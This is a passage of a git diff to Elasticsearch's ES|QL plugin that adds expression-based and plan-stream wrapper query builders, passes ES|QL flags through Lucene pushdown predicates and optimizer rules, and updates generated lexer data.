+ * + * @param seqNo Unique sequence number for this request in the bulk operation + * @param request The actual inference request to execute + */ + private record BulkRequestItem(long seqNo, InferenceAction.Request request) { + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/ExpressionQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/ExpressionQuery.java new file mode 100644 index 0000000000000..f3051b36adc06 --- /dev/null +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/ExpressionQuery.java @@ -0,0 +1,67 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +package org.elasticsearch.xpack.esql.io.stream; + +import org.elasticsearch.index.query.QueryBuilder; +import org.elasticsearch.xpack.esql.core.expression.Expression; +import org.elasticsearch.xpack.esql.core.querydsl.query.Query; +import org.elasticsearch.xpack.esql.core.tree.Source; + +import java.util.Objects; + +/** + * Implements an Expression query, which matches documents based on a given expression. + */ +public class ExpressionQuery extends Query { + + private final String targetFieldName; + private final Expression expression; + + public ExpressionQuery(Source source, String targetFieldName, Expression expression) { + super(source); + this.targetFieldName = targetFieldName; + this.expression = expression; + } + + public String field() { + return targetFieldName; + } + + @Override + protected QueryBuilder asBuilder() { + return new ExpressionQueryBuilder(targetFieldName, expression); + } + + @Override + public int hashCode() { + return Objects.hash(targetFieldName, expression); + } + + @Override + public boolean equals(Object obj) { + if (this == obj) { + return true; + } + + if (obj == null || getClass() != obj.getClass()) { + return false; + } + + ExpressionQuery other = (ExpressionQuery) obj; + return Objects.equals(targetFieldName, other.targetFieldName) && Objects.equals(expression, other.expression); + } + + @Override + protected String innerToString() { + return "ExpressionQuery{" + "field='" + targetFieldName + '\'' + '}'; + } + + @Override + public boolean containsPlan() { + return true; + } +} diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/ExpressionQueryBuilder.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/ExpressionQueryBuilder.java new file mode 100644 index 0000000000000..7c4d26f2dff86 --- /dev/null +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/ExpressionQueryBuilder.java @@ -0,0 +1,123 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.io.stream; + +import org.apache.lucene.search.MatchNoDocsQuery; +import org.apache.lucene.search.Query; +import org.elasticsearch.TransportVersion; +import org.elasticsearch.common.Strings; +import org.elasticsearch.common.io.stream.NamedWriteableRegistry; +import org.elasticsearch.common.io.stream.StreamInput; +import org.elasticsearch.common.io.stream.StreamOutput; +import org.elasticsearch.index.mapper.MappedFieldType; +import org.elasticsearch.index.query.AbstractQueryBuilder; +import org.elasticsearch.index.query.MultiTermQueryBuilder; +import org.elasticsearch.index.query.QueryBuilder; +import org.elasticsearch.index.query.SearchExecutionContext; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xpack.esql.capabilities.TranslationAware; +import org.elasticsearch.xpack.esql.core.expression.Expression; + +import java.io.IOException; +import java.util.Objects; + +import static org.apache.lucene.search.MultiTermQuery.CONSTANT_SCORE_REWRITE; + +/** + * Implements an Expression query builder, which matches documents based on a given expression. + * The expression itself must provide the {@link TranslationAware#asLuceneQuery} interface to be translated into a Lucene query. + * It allows for serialization of the expression and generate an AutomatonQuery on the data node + * as Automaton does not support serialization. + */ +public class ExpressionQueryBuilder extends AbstractQueryBuilder implements MultiTermQueryBuilder { + public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( + QueryBuilder.class, + "expressionQueryBuilder", + ExpressionQueryBuilder::new + ); + private final String fieldName; + private final Expression expression; + + public ExpressionQueryBuilder(String fieldName, Expression expression) { + if (Strings.isEmpty(fieldName)) { + throw new IllegalArgumentException("field name is null or empty"); + } + if (expression == null) { + throw new IllegalArgumentException("expression cannot be null"); + } + this.fieldName = fieldName; + this.expression = expression; + } + + /** + * Read from a stream. + */ + private ExpressionQueryBuilder(StreamInput in) throws IOException { + super(in); + fieldName = in.readString(); + assert in instanceof PlanStreamInput; + this.expression = in.readNamedWriteable(Expression.class); + } + + public Expression getExpression() { + return expression; + } + + @Override + protected void doWriteTo(StreamOutput out) throws IOException { + out.writeString(this.fieldName); + assert out instanceof PlanStreamOutput; + out.writeNamedWriteable(expression); + } + + @Override + public String fieldName() { + return fieldName; + } + + @Override + public String getWriteableName() { + return ENTRY.name; + } + + @Override + protected void doXContent(XContentBuilder builder, Params params) throws IOException { + builder.startObject(ENTRY.name); // Use the appropriate query name + builder.field("field", fieldName); + builder.field("expression", expression.toString()); + builder.endObject(); + } + + @Override + protected Query doToQuery(SearchExecutionContext context) { + if (expression instanceof TranslationAware translationAware) { + MappedFieldType fieldType = context.getFieldType(fieldName); + if (fieldType == null) { + return new MatchNoDocsQuery("Field [" + fieldName + "] does not exist"); + } + return translationAware.asLuceneQuery(fieldType, CONSTANT_SCORE_REWRITE, context); + } else { + throw new UnsupportedOperationException("ExpressionQueryBuilder does not support non-automaton expressions"); + } + } + + @Override + protected int doHashCode() { + return Objects.hash(fieldName, expression); + } + + @Override + protected boolean doEquals(ExpressionQueryBuilder other) { + return Objects.equals(fieldName, other.fieldName) && Objects.equals(expression, other.expression); + } + + @Override + public TransportVersion getMinimalSupportedVersion() { + throw new UnsupportedOperationException("AutomatonQueryBuilder does not support getMinimalSupportedVersion"); + } +} diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/PlanStreamWrapperQueryBuilder.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/PlanStreamWrapperQueryBuilder.java new file mode 100644 index 0000000000000..17554e8bf09fe --- /dev/null +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/PlanStreamWrapperQueryBuilder.java @@ -0,0 +1,111 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.io.stream; + +import org.apache.lucene.search.Query; +import org.elasticsearch.TransportVersion; +import org.elasticsearch.TransportVersions; +import org.elasticsearch.common.io.stream.NamedWriteableRegistry; +import org.elasticsearch.common.io.stream.StreamInput; +import org.elasticsearch.common.io.stream.StreamOutput; +import org.elasticsearch.index.query.QueryBuilder; +import org.elasticsearch.index.query.SearchExecutionContext; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xpack.esql.session.Configuration; + +import java.io.IOException; + +import static org.elasticsearch.index.query.WildcardQueryBuilder.expressionTransportSupported; + +/** + * A {@link QueryBuilder} that wraps another {@linkplain QueryBuilder} + * so it read with a {@link PlanStreamInput}. + */ +public class PlanStreamWrapperQueryBuilder implements QueryBuilder { + public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( + QueryBuilder.class, + "planwrapper", + PlanStreamWrapperQueryBuilder::new + ); + + private final Configuration configuration; + private final QueryBuilder next; + + public PlanStreamWrapperQueryBuilder(Configuration configuration, QueryBuilder next) { + this.configuration = configuration; + this.next = next; + } + + public PlanStreamWrapperQueryBuilder(StreamInput in) throws IOException { + configuration = Configuration.readWithoutTables(in); + PlanStreamInput planStreamInput = new PlanStreamInput(in, in.namedWriteableRegistry(), configuration); + next = planStreamInput.readNamedWriteable(QueryBuilder.class); + } + + @Override + public void writeTo(StreamOutput out) throws IOException { + configuration.withoutTables().writeTo(out); + new PlanStreamOutput(out, configuration).writeNamedWriteable(next); + } + + @Override + public TransportVersion getMinimalSupportedVersion() { + return TransportVersions.ESQL_FIXED_INDEX_LIKE_9_1; + } + + @Override + public boolean supportsVersion(TransportVersion version) { + return expressionTransportSupported(version); + } + + @Override + public Query toQuery(SearchExecutionContext context) throws IOException { + return next.toQuery(context); + } + + @Override + public QueryBuilder queryName(String queryName) { + next.queryName(queryName); + return this; + } + + @Override + public String queryName() { + return next.queryName(); + } + + @Override + public float boost() { + return next.boost(); + } + + @Override + public QueryBuilder boost(float boost) { + next.boost(boost); + return this; + } + + @Override + public String getName() { + return getWriteableName(); + } + + @Override + public String getWriteableName() { + return ENTRY.name; + } + + @Override + public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { + return next.toXContent(builder, params); + } + + public QueryBuilder next() { + return next; + } +} diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/LocalPhysicalOptimizerContext.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/LocalPhysicalOptimizerContext.java index 22e07b45310fb..1be024c9af76a 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/LocalPhysicalOptimizerContext.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/LocalPhysicalOptimizerContext.java @@ -8,7 +8,8 @@ package org.elasticsearch.xpack.esql.optimizer; import org.elasticsearch.xpack.esql.core.expression.FoldContext; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import org.elasticsearch.xpack.esql.session.Configuration; import org.elasticsearch.xpack.esql.stats.SearchStats; -public record LocalPhysicalOptimizerContext(Configuration configuration, FoldContext foldCtx, SearchStats searchStats) {} +public record LocalPhysicalOptimizerContext(EsqlFlags flags, Configuration configuration, FoldContext foldCtx, SearchStats searchStats) {} diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/ProjectAwayColumns.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/ProjectAwayColumns.java index 26cfbf40eb7ff..887fb039a14cb 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/ProjectAwayColumns.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/ProjectAwayColumns.java @@ -76,7 +76,19 @@ public PhysicalPlan apply(PhysicalPlan plan) { // no need for projection when dealing with aggs if (logicalFragment instanceof Aggregate == false) { - List output = new ArrayList<>(requiredAttrBuilder.build()); + // we should respect the order of the attributes + List output = new ArrayList<>(); + for (Attribute attribute : logicalFragment.output()) { + if (requiredAttrBuilder.contains(attribute)) { + output.add(attribute); + requiredAttrBuilder.remove(attribute); + } + } + // requiredAttrBuilder should be empty unless the plan is inconsistent due to a bug. + // This can happen in case of remote ENRICH, see https://github.com/elastic/elasticsearch/issues/118531 + // TODO: stop adding the remaining required attributes once remote ENRICH is fixed. + output.addAll(requiredAttrBuilder.build()); + // if all the fields are filtered out, it's only the count that matters // however until a proper fix (see https://github.com/elastic/elasticsearch/issues/98703) // add a synthetic field (so it doesn't clash with the user defined one) to return a constant diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/EnableSpatialDistancePushdown.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/EnableSpatialDistancePushdown.java index 1e976ca2e6263..3e087bf64c1a0 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/EnableSpatialDistancePushdown.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/EnableSpatialDistancePushdown.java @@ -77,14 +77,14 @@ public class EnableSpatialDistancePushdown extends PhysicalOptimizerRules.Parame protected PhysicalPlan rule(FilterExec filterExec, LocalPhysicalOptimizerContext ctx) { PhysicalPlan plan = filterExec; if (filterExec.child() instanceof EsQueryExec esQueryExec) { - plan = rewrite(ctx.foldCtx(), filterExec, esQueryExec, LucenePushdownPredicates.from(ctx.searchStats())); + plan = rewrite(ctx.foldCtx(), filterExec, esQueryExec, LucenePushdownPredicates.from(ctx.searchStats(), ctx.flags())); } else if (filterExec.child() instanceof EvalExec evalExec && evalExec.child() instanceof EsQueryExec esQueryExec) { plan = rewriteBySplittingFilter( ctx.foldCtx(), filterExec, evalExec, esQueryExec, - LucenePushdownPredicates.from(ctx.searchStats()) + LucenePushdownPredicates.from(ctx.searchStats(), ctx.flags()) ); } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/LucenePushdownPredicates.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/LucenePushdownPredicates.java index a476086980534..aa9ea3b0e004b 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/LucenePushdownPredicates.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/LucenePushdownPredicates.java @@ -7,12 +7,16 @@ package org.elasticsearch.xpack.esql.optimizer.rules.physical.local; +import org.elasticsearch.TransportVersion; +import org.elasticsearch.core.Nullable; +import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; import org.elasticsearch.xpack.esql.core.expression.MetadataAttribute; import org.elasticsearch.xpack.esql.core.expression.TypedAttribute; import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.core.util.Check; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import org.elasticsearch.xpack.esql.stats.SearchStats; /** @@ -30,6 +34,26 @@ * */ public interface LucenePushdownPredicates { + /** + * If we're extracting a query for {@code can_match} then this is the + * minimum transport version in the cluster. Otherwise, this is {@code null}. + *

+ * If this is not null {@link Expression}s should not claim to be + * serializable unless their {@link QueryBuilder} + * {@link QueryBuilder#supportsVersion supports} the version. + *

+ *

+ * This is done on the coordinating node and. And for + * cross cluster search this is done on the coordinating node on the + * remote cluster. So! We actually have the minimum + * cluster transport version. + *

+ */ + @Nullable + TransportVersion minTransportVersion(); + + EsqlFlags flags(); + /** * For TEXT fields, we need to check if the field has a subfield of type KEYWORD that can be used instead. */ @@ -101,38 +125,65 @@ static String pushableAttributeName(TypedAttribute attribute) { * In particular, it assumes TEXT fields have no exact subfields (underlying keyword field), * and that isAggregatable means indexed and has hasDocValues. */ - LucenePushdownPredicates DEFAULT = new LucenePushdownPredicates() { - @Override - public boolean hasExactSubfield(FieldAttribute attr) { - return false; - } + LucenePushdownPredicates DEFAULT = forCanMatch(null, new EsqlFlags(true)); - @Override - public boolean isIndexedAndHasDocValues(FieldAttribute attr) { - // Is the FieldType.isAggregatable() check correct here? In FieldType isAggregatable usually only means hasDocValues - return attr.field().isAggregatable(); - } + /** + * A {@link LucenePushdownPredicates} for use with the {@code can_match} phase. + */ + static LucenePushdownPredicates forCanMatch(TransportVersion minTransportVersion, EsqlFlags flags) { + return new LucenePushdownPredicates() { + @Override + public TransportVersion minTransportVersion() { + return minTransportVersion; + } - @Override - public boolean isIndexed(FieldAttribute attr) { - // TODO: This is the original behaviour, but is it correct? In FieldType isAggregatable usually only means hasDocValues - return attr.field().isAggregatable(); - } + @Override + public EsqlFlags flags() { + return flags; + } - @Override - public boolean canUseEqualityOnSyntheticSourceDelegate(FieldAttribute attr, String value) { - return false; - } - }; + @Override + public boolean hasExactSubfield(FieldAttribute attr) { + return false; + } + + @Override + public boolean isIndexedAndHasDocValues(FieldAttribute attr) { + // Is the FieldType.isAggregatable() check correct here? In FieldType isAggregatable usually only means hasDocValues + return attr.field().isAggregatable(); + } + + @Override + public boolean isIndexed(FieldAttribute attr) { + // TODO: This is the original behaviour, but is it correct? In FieldType isAggregatable usually only means hasDocValues + return attr.field().isAggregatable(); + } + + @Override + public boolean canUseEqualityOnSyntheticSourceDelegate(FieldAttribute attr, String value) { + return false; + } + }; + } /** * If we have access to {@link SearchStats} over a collection of shards, we can make more fine-grained decisions about what can be * pushed down. This should open up more opportunities for lucene pushdown. */ - static LucenePushdownPredicates from(SearchStats stats) { + static LucenePushdownPredicates from(SearchStats stats, EsqlFlags flags) { // TODO: use FieldAttribute#fieldName, otherwise this doesn't apply to field attributes used for union types. // C.f. https://github.com/elastic/elasticsearch/issues/128905 return new LucenePushdownPredicates() { + @Override + public TransportVersion minTransportVersion() { + return null; + } + + @Override + public EsqlFlags flags() { + return flags; + } + @Override public boolean hasExactSubfield(FieldAttribute attr) { return stats.hasExactSubfield(new FieldAttribute.FieldName(attr.name())); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushFiltersToSource.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushFiltersToSource.java index 1f8341c4768d2..ba382b9800ece 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushFiltersToSource.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushFiltersToSource.java @@ -53,7 +53,7 @@ protected PhysicalPlan rule(FilterExec filterExec, LocalPhysicalOptimizerContext } private static PhysicalPlan planFilterExec(FilterExec filterExec, EsQueryExec queryExec, LocalPhysicalOptimizerContext ctx) { - LucenePushdownPredicates pushdownPredicates = LucenePushdownPredicates.from(ctx.searchStats()); + LucenePushdownPredicates pushdownPredicates = LucenePushdownPredicates.from(ctx.searchStats(), ctx.flags()); List pushable = new ArrayList<>(); List nonPushable = new ArrayList<>(); for (Expression exp : splitAnd(filterExec.condition())) { @@ -75,7 +75,7 @@ private static PhysicalPlan planFilterExec( EsQueryExec queryExec, LocalPhysicalOptimizerContext ctx ) { - LucenePushdownPredicates pushdownPredicates = LucenePushdownPredicates.from(ctx.searchStats()); + LucenePushdownPredicates pushdownPredicates = LucenePushdownPredicates.from(ctx.searchStats(), ctx.flags()); AttributeMap aliasReplacedBy = getAliasReplacedBy(evalExec); List pushable = new ArrayList<>(); List nonPushable = new ArrayList<>(); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSource.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSource.java index 02d2f49605ced..8ec6d6b4bee39 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSource.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSource.java @@ -63,7 +63,7 @@ public class PushTopNToSource extends PhysicalOptimizerRules.ParameterizedOptimi @Override protected PhysicalPlan rule(TopNExec topNExec, LocalPhysicalOptimizerContext ctx) { - Pushable pushable = evaluatePushable(ctx.foldCtx(), topNExec, LucenePushdownPredicates.from(ctx.searchStats())); + Pushable pushable = evaluatePushable(ctx.foldCtx(), topNExec, LucenePushdownPredicates.from(ctx.searchStats(), ctx.flags())); return pushable.rewrite(topNExec); } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseLexer.interp b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseLexer.interp index bdbf88454ca0d..1154fb89a4c42 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseLexer.interp +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseLexer.interp @@ -336,6 +336,7 @@ ENRICH_WITH ENRICH_POLICY_NAME_BODY ENRICH_POLICY_NAME ENRICH_MODE_UNQUOTED_VALUE +ENRICH_QUOTED_POLICY_NAME ENRICH_LINE_COMMENT ENRICH_MULTILINE_COMMENT ENRICH_WS @@ -554,4 +555,4 @@ RENAME_MODE SHOW_MODE atn: -[4, 0, 139, 1856, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 2, 0, 7, 0, 2, 1, 7, 1, 2, 2, 7, 2, 2, 3, 7, 3, 2, 4, 7, 4, 2, 5, 7, 5, 2, 6, 7, 6, 2, 7, 7, 7, 2, 8, 7, 8, 2, 9, 7, 9, 2, 10, 7, 10, 2, 11, 7, 11, 2, 12, 7, 12, 2, 13, 7, 13, 2, 14, 7, 14, 2, 15, 7, 15, 2, 16, 7, 16, 2, 17, 7, 17, 2, 18, 7, 18, 2, 19, 7, 19, 2, 20, 7, 20, 2, 21, 7, 21, 2, 22, 7, 22, 2, 23, 7, 23, 2, 24, 7, 24, 2, 25, 7, 25, 2, 26, 7, 26, 2, 27, 7, 27, 2, 28, 7, 28, 2, 29, 7, 29, 2, 30, 7, 30, 2, 31, 7, 31, 2, 32, 7, 32, 2, 33, 7, 33, 2, 34, 7, 34, 2, 35, 7, 35, 2, 36, 7, 36, 2, 37, 7, 37, 2, 38, 7, 38, 2, 39, 7, 39, 2, 40, 7, 40, 2, 41, 7, 41, 2, 42, 7, 42, 2, 43, 7, 43, 2, 44, 7, 44, 2, 45, 7, 45, 2, 46, 7, 46, 2, 47, 7, 47, 2, 48, 7, 48, 2, 49, 7, 49, 2, 50, 7, 50, 2, 51, 7, 51, 2, 52, 7, 52, 2, 53, 7, 53, 2, 54, 7, 54, 2, 55, 7, 55, 2, 56, 7, 56, 2, 57, 7, 57, 2, 58, 7, 58, 2, 59, 7, 59, 2, 60, 7, 60, 2, 61, 7, 61, 2, 62, 7, 62, 2, 63, 7, 63, 2, 64, 7, 64, 2, 65, 7, 65, 2, 66, 7, 66, 2, 67, 7, 67, 2, 68, 7, 68, 2, 69, 7, 69, 2, 70, 7, 70, 2, 71, 7, 71, 2, 72, 7, 72, 2, 73, 7, 73, 2, 74, 7, 74, 2, 75, 7, 75, 2, 76, 7, 76, 2, 77, 7, 77, 2, 78, 7, 78, 2, 79, 7, 79, 2, 80, 7, 80, 2, 81, 7, 81, 2, 82, 7, 82, 2, 83, 7, 83, 2, 84, 7, 84, 2, 85, 7, 85, 2, 86, 7, 86, 2, 87, 7, 87, 2, 88, 7, 88, 2, 89, 7, 89, 2, 90, 7, 90, 2, 91, 7, 91, 2, 92, 7, 92, 2, 93, 7, 93, 2, 94, 7, 94, 2, 95, 7, 95, 2, 96, 7, 96, 2, 97, 7, 97, 2, 98, 7, 98, 2, 99, 7, 99, 2, 100, 7, 100, 2, 101, 7, 101, 2, 102, 7, 102, 2, 103, 7, 103, 2, 104, 7, 104, 2, 105, 7, 105, 2, 106, 7, 106, 2, 107, 7, 107, 2, 108, 7, 108, 2, 109, 7, 109, 2, 110, 7, 110, 2, 111, 7, 111, 2, 112, 7, 112, 2, 113, 7, 113, 2, 114, 7, 114, 2, 115, 7, 115, 2, 116, 7, 116, 2, 117, 7, 117, 2, 118, 7, 118, 2, 119, 7, 119, 2, 120, 7, 120, 2, 121, 7, 121, 2, 122, 7, 122, 2, 123, 7, 123, 2, 124, 7, 124, 2, 125, 7, 125, 2, 126, 7, 126, 2, 127, 7, 127, 2, 128, 7, 128, 2, 129, 7, 129, 2, 130, 7, 130, 2, 131, 7, 131, 2, 132, 7, 132, 2, 133, 7, 133, 2, 134, 7, 134, 2, 135, 7, 135, 2, 136, 7, 136, 2, 137, 7, 137, 2, 138, 7, 138, 2, 139, 7, 139, 2, 140, 7, 140, 2, 141, 7, 141, 2, 142, 7, 142, 2, 143, 7, 143, 2, 144, 7, 144, 2, 145, 7, 145, 2, 146, 7, 146, 2, 147, 7, 147, 2, 148, 7, 148, 2, 149, 7, 149, 2, 150, 7, 150, 2, 151, 7, 151, 2, 152, 7, 152, 2, 153, 7, 153, 2, 154, 7, 154, 2, 155, 7, 155, 2, 156, 7, 156, 2, 157, 7, 157, 2, 158, 7, 158, 2, 159, 7, 159, 2, 160, 7, 160, 2, 161, 7, 161, 2, 162, 7, 162, 2, 163, 7, 163, 2, 164, 7, 164, 2, 165, 7, 165, 2, 166, 7, 166, 2, 167, 7, 167, 2, 168, 7, 168, 2, 169, 7, 169, 2, 170, 7, 170, 2, 171, 7, 171, 2, 172, 7, 172, 2, 173, 7, 173, 2, 174, 7, 174, 2, 175, 7, 175, 2, 176, 7, 176, 2, 177, 7, 177, 2, 178, 7, 178, 2, 179, 7, 179, 2, 180, 7, 180, 2, 181, 7, 181, 2, 182, 7, 182, 2, 183, 7, 183, 2, 184, 7, 184, 2, 185, 7, 185, 2, 186, 7, 186, 2, 187, 7, 187, 2, 188, 7, 188, 2, 189, 7, 189, 2, 190, 7, 190, 2, 191, 7, 191, 2, 192, 7, 192, 2, 193, 7, 193, 2, 194, 7, 194, 2, 195, 7, 195, 2, 196, 7, 196, 2, 197, 7, 197, 2, 198, 7, 198, 2, 199, 7, 199, 2, 200, 7, 200, 2, 201, 7, 201, 2, 202, 7, 202, 2, 203, 7, 203, 2, 204, 7, 204, 2, 205, 7, 205, 2, 206, 7, 206, 2, 207, 7, 207, 2, 208, 7, 208, 2, 209, 7, 209, 2, 210, 7, 210, 2, 211, 7, 211, 2, 212, 7, 212, 2, 213, 7, 213, 2, 214, 7, 214, 2, 215, 7, 215, 2, 216, 7, 216, 2, 217, 7, 217, 2, 218, 7, 218, 2, 219, 7, 219, 2, 220, 7, 220, 2, 221, 7, 221, 2, 222, 7, 222, 2, 223, 7, 223, 2, 224, 7, 224, 2, 225, 7, 225, 2, 226, 7, 226, 2, 227, 7, 227, 2, 228, 7, 228, 2, 229, 7, 229, 2, 230, 7, 230, 2, 231, 7, 231, 2, 232, 7, 232, 2, 233, 7, 233, 2, 234, 7, 234, 2, 235, 7, 235, 2, 236, 7, 236, 2, 237, 7, 237, 2, 238, 7, 238, 2, 239, 7, 239, 2, 240, 7, 240, 2, 241, 7, 241, 2, 242, 7, 242, 2, 243, 7, 243, 2, 244, 7, 244, 2, 245, 7, 245, 2, 246, 7, 246, 1, 0, 1, 0, 1, 0, 1, 0, 5, 0, 515, 8, 0, 10, 0, 12, 0, 518, 9, 0, 1, 0, 3, 0, 521, 8, 0, 1, 0, 3, 0, 524, 8, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 5, 1, 533, 8, 1, 10, 1, 12, 1, 536, 9, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 4, 2, 544, 8, 2, 11, 2, 12, 2, 545, 1, 2, 1, 2, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 8, 1, 8, 1, 8, 1, 8, 1, 8, 1, 8, 1, 8, 1, 9, 1, 9, 1, 9, 1, 9, 1, 9, 1, 9, 1, 9, 1, 10, 1, 10, 1, 10, 1, 10, 1, 10, 1, 10, 1, 10, 1, 10, 1, 11, 1, 11, 1, 11, 1, 11, 1, 11, 1, 11, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 15, 1, 15, 1, 15, 1, 15, 1, 15, 1, 15, 1, 15, 1, 15, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 18, 1, 18, 1, 18, 1, 18, 1, 18, 1, 18, 1, 18, 1, 19, 1, 19, 1, 19, 1, 19, 1, 19, 1, 19, 1, 20, 1, 20, 1, 20, 1, 20, 1, 20, 1, 20, 1, 20, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 22, 1, 22, 1, 22, 1, 22, 1, 22, 1, 22, 1, 22, 1, 22, 1, 23, 1, 23, 1, 23, 1, 23, 1, 23, 1, 23, 1, 23, 1, 23, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 27, 1, 27, 1, 27, 1, 27, 1, 27, 1, 27, 1, 27, 1, 28, 1, 28, 1, 28, 1, 28, 1, 28, 1, 28, 1, 28, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 30, 1, 30, 1, 30, 1, 30, 1, 30, 1, 30, 1, 30, 1, 31, 1, 31, 1, 31, 1, 31, 1, 31, 1, 31, 1, 31, 1, 31, 1, 31, 